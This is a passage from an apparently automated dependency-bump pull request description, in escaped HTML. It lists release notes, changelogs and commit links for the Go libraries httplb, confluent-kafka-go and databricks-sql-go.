href=\"https://github.com/bufbuild/httplb/commit/1d8b08bf629130667a8e21ee6b67ac651504b0d2\"\u003e\u003ccode\u003e1d8b08b\u003c/code\u003e\u003c/a\u003e Make it safe for users to wrap transport with their own middleware (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/79\"\u003e#79\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/cb2bdba129ed38150522a6efcc0fae81399952b0\"\u003e\u003ccode\u003ecb2bdba\u003c/code\u003e\u003c/a\u003e Add go1.24-specific implementation of \u0026quot;h2c\u0026quot; scheme (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/76\"\u003e#76\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/b069868c025018f85cf3b22f0344290740aa8959\"\u003e\u003ccode\u003eb069868\u003c/code\u003e\u003c/a\u003e Update usage of random number generators (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/77\"\u003e#77\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/48a551d69c59fe25a07ecf939e6fabea0bad52d4\"\u003e\u003ccode\u003e48a551d\u003c/code\u003e\u003c/a\u003e Fix usage of timers for go 1.23 (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/74\"\u003e#74\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/d2dee4797db90d405e6281a9357ad898aa0c2736\"\u003e\u003ccode\u003ed2dee47\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/net from 0.36.0 to 0.38.0 (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/75\"\u003e#75\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/0a208491525e165a6e021b151605ed14a39f301e\"\u003e\u003ccode\u003e0a20849\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/net from 0.33.0 to 0.36.0 (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/73\"\u003e#73\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/503b18adbeb5c1be8b95bd9c548074cbc5d25ab5\"\u003e\u003ccode\u003e503b18a\u003c/code\u003e\u003c/a\u003e Bump golang.org/x/net from 0.23.0 to 0.33.0 (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/72\"\u003e#72\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bufbuild/httplb/commit/023d3e522c53ff63070a8d52b86191ddc8f1c075\"\u003e\u003ccode\u003e023d3e5\u003c/code\u003e\u003c/a\u003e Add new WithDisableCompression configuration (\u003ca href=\"https://redirect.github.com/bufbuild/httplb/issues/71\"\u003e#71\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/bufbuild/httplb/compare/v0.3.1...v0.4.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/confluentinc/confluent-kafka-go/v2` from 2.8.0 to 2.14.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/releases\"\u003egithub.com/confluentinc/confluent-kafka-go/v2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.14.1\u003c/h2\u003e\n\u003cp\u003eThis is a maintenance release:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eBundle prebuilt binaries for linux-s390x (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/5365\"\u003e#5365\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003econfluent-kafka-go is based on librdkafka v2.14.1, see the \u003ca href=\"https://github.com/confluentinc/librdkafka/releases/tag/v2.14.1\"\u003elibrdkafka v2.14.1 release notes\u003c/a\u003e for a complete list of changes, enhancements, fixes and upgrade considerations.\u003c/p\u003e\n\u003ch2\u003ev2.14.0\u003c/h2\u003e\n\u003cp\u003eThis is a feature release:\u003c/p\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Azure User-Assigned Managed Identity (UAMI) authentication in Schema Registry client\u003c/li\u003e\n\u003cli\u003eAdd AssociatedNameStrategy (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1515\"\u003e#1515\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd enableAt to RuleSet (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1530\"\u003e#1530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDereference map ptrs for data quality rules (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1532\"\u003e#1532\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003econfluent-kafka-go is based on librdkafka v2.14.0, see the\n\u003ca href=\"https://github.com/confluentinc/librdkafka/releases/tag/v2.14.0\"\u003elibrdkafka v2.14.0 release notes\u003c/a\u003e\nfor a complete list of changes, enhancements, fixes and upgrade considerations.\u003c/p\u003e\n\u003ch2\u003ev2.13.3\u003c/h2\u003e\n\u003cp\u003eThis is a maintenance release:\u003c/p\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow compatibility with librdkafka 2.13.0+ (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1524\"\u003e#1524\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.13.2\u003c/h2\u003e\n\u003cp\u003eThis is a maintenance release:\u003c/p\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow Azure KMS key version to be optional (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1503\"\u003e#1503\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eschemaregistry/rules/encryption: fix dropped errors (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1512\"\u003e#1512\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdate frozen semantics for associations in mock SR client (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1514\"\u003e#1514\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003econfluent-kafka-go is based on librdkafka v2.13.2, see the\n\u003ca href=\"https://github.com/confluentinc/librdkafka/releases/tag/v2.13.2\"\u003elibrdkafka v2.13.2 release notes\u003c/a\u003e\nfor a complete list of changes, enhancements, fixes and upgrade considerations.\u003c/p\u003e\n\u003ch2\u003ev2.13.0\u003c/h2\u003e\n\u003ch2\u003eEnhancements\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for forwarding librdkafka log events to a Go channel in AdminClient (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1448\"\u003e#1448\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd support for FIPS 140-3 on Schema Registry operations (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1486\"\u003e#1486\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd Schema Registry Associations support with mock client implementation (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1485\"\u003e#1485\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd associations example (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1498\"\u003e#1498\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHandle evolution during field transformation (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1490\"\u003e#1490\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd Accept-Version header to Schema Registry requests (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1487\"\u003e#1487\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixes\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/blob/master/CHANGELOG.md\"\u003egithub.com/confluentinc/confluent-kafka-go/v2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.14.1\u003c/h2\u003e\n\u003cp\u003eThis is a maintenance release:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eBundle prebuilt binaries for linux-s390x (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/5365\"\u003e#5365\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003econfluent-kafka-go is based on librdkafka v2.14.1, see the\n\u003ca href=\"https://github.com/confluentinc/librdkafka/releases/tag/v2.14.1\"\u003elibrdkafka v2.14.1 release notes\u003c/a\u003e\nfor a complete list of changes, enhancements, fixes and upgrade considerations.\u003c/p\u003e\n\u003ch2\u003ev2.14.0\u003c/h2\u003e\n\u003cp\u003eThis is a feature release:\u003c/p\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Azure User-Assigned Managed Identity (UAMI) authentication in Schema Registry client\u003c/li\u003e\n\u003cli\u003eAdd AssociatedNameStrategy (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1515\"\u003e#1515\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd enableAt to RuleSet (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1530\"\u003e#1530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDereference map ptrs for data quality rules (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1532\"\u003e#1532\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003econfluent-kafka-go is based on librdkafka v2.14.0, see the\n\u003ca href=\"https://github.com/confluentinc/librdkafka/releases/tag/v2.14.0\"\u003elibrdkafka v2.14.0 release notes\u003c/a\u003e\nfor a complete list of changes, enhancements, fixes and upgrade considerations.\u003c/p\u003e\n\u003ch2\u003ev2.13.3\u003c/h2\u003e\n\u003cp\u003eThis is a maintenance release:\u003c/p\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow compatibility with librdkafka 2.13.0+ (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1524\"\u003e#1524\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.13.2\u003c/h2\u003e\n\u003cp\u003eThis is a maintenance release:\u003c/p\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow Azure KMS key version to be optional (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1503\"\u003e#1503\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eschemaregistry/rules/encryption: fix dropped errors (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1512\"\u003e#1512\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdate frozen semantics for associations in mock SR client (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1514\"\u003e#1514\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003econfluent-kafka-go is based on librdkafka v2.13.2, see the\n\u003ca href=\"https://github.com/confluentinc/librdkafka/releases/tag/v2.13.2\"\u003elibrdkafka v2.13.2 release notes\u003c/a\u003e\nfor a complete list of changes, enhancements, fixes and upgrade considerations.\u003c/p\u003e\n\u003ch2\u003ev2.13.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/a66372dced3f540bfac02fec247adce7ab8a3ba8\"\u003e\u003ccode\u003ea66372d\u003c/code\u003e\u003c/a\u003e Import v2.14.1 (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1538\"\u003e#1538\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/4655d16aad4a3b3a85977b508ae80c65536da396\"\u003e\u003ccode\u003e4655d16\u003c/code\u003e\u003c/a\u003e Revert docker_aws_lambda_example go.sum\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/35eb1a8343dd92eeb7901be5246135362dd9a418\"\u003e\u003ccode\u003e35eb1a8\u003c/code\u003e\u003c/a\u003e Documentation and error code update for librdkafka v2.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/4ea2d93de96159f7f30d687d5b93b6714b988e98\"\u003e\u003ccode\u003e4ea2d93\u003c/code\u003e\u003c/a\u003e librdkafka static bundle v2.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/8ff80a5dc8fa32e9c26cd26a3c87ea600f720b70\"\u003e\u003ccode\u003e8ff80a5\u003c/code\u003e\u003c/a\u003e librdkafka and confluent-kafka-go version v2.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/054636bcbe4fb92e0fa333d2ed7010b20d09279a\"\u003e\u003ccode\u003e054636b\u003c/code\u003e\u003c/a\u003e Import v2.14.1-RC1 (\u003ca href=\"https://redirect.github.com/confluentinc/confluent-kafka-go/issues/1537\"\u003e#1537\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/b255e91d4dc6be5030b661bfb034bf0577faffed\"\u003e\u003ccode\u003eb255e91\u003c/code\u003e\u003c/a\u003e Fix CHANGELOG version to v2.14.1-RC1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/0c3351dfd6841eeac9a60a1e417082e41c46924e\"\u003e\u003ccode\u003e0c3351d\u003c/code\u003e\u003c/a\u003e Documentation and error code update for librdkafka v2.14.1-RC1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/cd50a1cd708089601065441b50e5682cf1c5fd51\"\u003e\u003ccode\u003ecd50a1c\u003c/code\u003e\u003c/a\u003e librdkafka static bundle v2.14.1-RC1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/commit/34041a94255f59fdf6e16f4af7c2c85574797520\"\u003e\u003ccode\u003e34041a9\u003c/code\u003e\u003c/a\u003e librdkafka and confluent-kafka-go version v2.14.1-RC1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/confluentinc/confluent-kafka-go/compare/v2.8.0...v2.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/databricks/databricks-sql-go` from 1.7.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/databricks/databricks-sql-go/releases\"\u003egithub.com/databricks/databricks-sql-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.11.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#320\u003c/code\u003e\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/321\"\u003e#321\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/322\"\u003e#322\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/349\"\u003e#349\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd SPOG (Custom URL) routing support via \u003ccode\u003ex-databricks-org-id\u003c/code\u003e\u003ccode\u003edatabricks/databricks-sql-go#347\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#341\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#326\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#351\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#325\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.10.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#290\u003c/code\u003e\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/291\"\u003e#291\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#297\u003c/code\u003e\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/304\"\u003e#304\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/305\"\u003e#305\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/311\"\u003e#311\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/319\"\u003e#319\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#316\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#295\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#308\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#286\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.9.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for query tags\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#283\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/databricks/databricks-sql-go/compare/v1.8.0...v1.9.0\"\u003ehttps://github.com/databricks/databricks-sql-go/compare/v1.8.0...v1.9.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.8.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnsure thrift field IDs stay within range by \u003ca href=\"https://github.com/vikrantpuppala\"\u003e\u003ccode\u003e@​vikrantpuppala\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/276\"\u003edatabricks/databricks-sql-go#276\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd Arrow IPC stream iterator for direct access to Arrow buffer by \u003ca href=\"https://github.com/jadewang-db\"\u003e\u003ccode\u003e@​jadewang-db\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/279\"\u003edatabricks/databricks-sql-go#279\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare for v1.8.0 release by \u003ca href=\"https://github.com/jadewang-db\"\u003e\u003ccode\u003e@​jadewang-db\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/280\"\u003edatabricks/databricks-sql-go#280\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jadewang-db\"\u003e\u003ccode\u003e@​jadewang-db\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/279\"\u003edatabricks/databricks-sql-go#279\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/databricks/databricks-sql-go/compare/v1.7.1...v1.8.0\"\u003ehttps://github.com/databricks/databricks-sql-go/compare/v1.7.1...v1.8.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.7.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix critical CVE-2024-45337 by \u003ca href=\"https://github.com/vikrantpuppala\"\u003e\u003ccode\u003e@​vikrantpuppala\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/264\"\u003edatabricks/databricks-sql-go#264\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd nil handling for isStagingOperation to handle older DBR versions by \u003ca href=\"https://github.com/vikrantpuppala\"\u003e\u003ccode\u003e@​vikrantpuppala\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/266\"\u003edatabricks/databricks-sql-go#266\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[PECOBLR-402] Update thrift client library after cleaning up unused fields and structs by \u003ca href=\"https://github.com/gopalldb\"\u003e\u003ccode\u003e@​gopalldb\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/268\"\u003edatabricks/databricks-sql-go#268\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd schema to ArrowBatchIterator by \u003ca href=\"https://github.com/vikrantpuppala\"\u003e\u003ccode\u003e@​vikrantpuppala\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/267\"\u003edatabricks/databricks-sql-go#267\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gopalldb\"\u003e\u003ccode\u003e@​gopalldb\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/pull/268\"\u003edatabricks/databricks-sql-go#268\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/databricks/databricks-sql-go/compare/v1.7.0...v1.7.1\"\u003ehttps://github.com/databricks/databricks-sql-go/compare/v1.7.0...v1.7.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/databricks/databricks-sql-go/blob/main/CHANGELOG.md\"\u003egithub.com/databricks/databricks-sql-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.11.0 (2026-04-16)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#320\u003c/code\u003e\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/321\"\u003e#321\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/322\"\u003e#322\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/349\"\u003e#349\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd SPOG (Custom URL) routing support via \u003ccode\u003ex-databricks-org-id\u003c/code\u003e\u003ccode\u003edatabricks/databricks-sql-go#347\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#341\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#326\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#351\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#325\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.10.0 (2026-02-19)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#290\u003c/code\u003e\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/291\"\u003e#291\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#297\u003c/code\u003e\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/304\"\u003e#304\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/305\"\u003e#305\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/311\"\u003e#311\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/319\"\u003e#319\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#316\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#295\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#308\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#286\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.9.0 (2025-09-17)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for query tags\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#283\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.8.0 (2025-07-24)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd Arrow IPC Iterator\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.7.1 (2025-05-20)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#267\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#268\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#266\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edatabricks/databricks-sql-go#264\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/f4d99924f71c94faffaa896ce8c3e427b303fb7b\"\u003e\u003ccode\u003ef4d9992\u003c/code\u003e\u003c/a\u003e Prepare for v1.11.0 release (\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/352\"\u003e#352\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/12c3f2a89f74b92842ed24836b326defba36143d\"\u003e\u003ccode\u003e12c3f2a\u003c/code\u003e\u003c/a\u003e Add SPOG (Custom URL) routing support via x-databricks-org-id header (\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/347\"\u003e#347\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/3c0f7e41f3ba1f1feff6b6f508eb527690706181\"\u003e\u003ccode\u003e3c0f7e4\u003c/code\u003e\u003c/a\u003e [ES-1804970] Fix CloudFetch returning stale column names from cached results ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/databricks/databricks-sql-go/commit/305e3bc8de47034d3e144e3c34d03c4abaf7a04c\"\u003e\u003ccode\u003e305e3bc\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Add enforceEmbeddedSchemaCorrectness to TExecuteStatementReq (\u003ca href=\"https://redirect.github.com/databricks/databricks-sql-go/issues/344\"\u003e#344\u003c/a\u003e)\u0026quot; ...\u003c/li\u003e\n\u003cli\u003e\u003ca 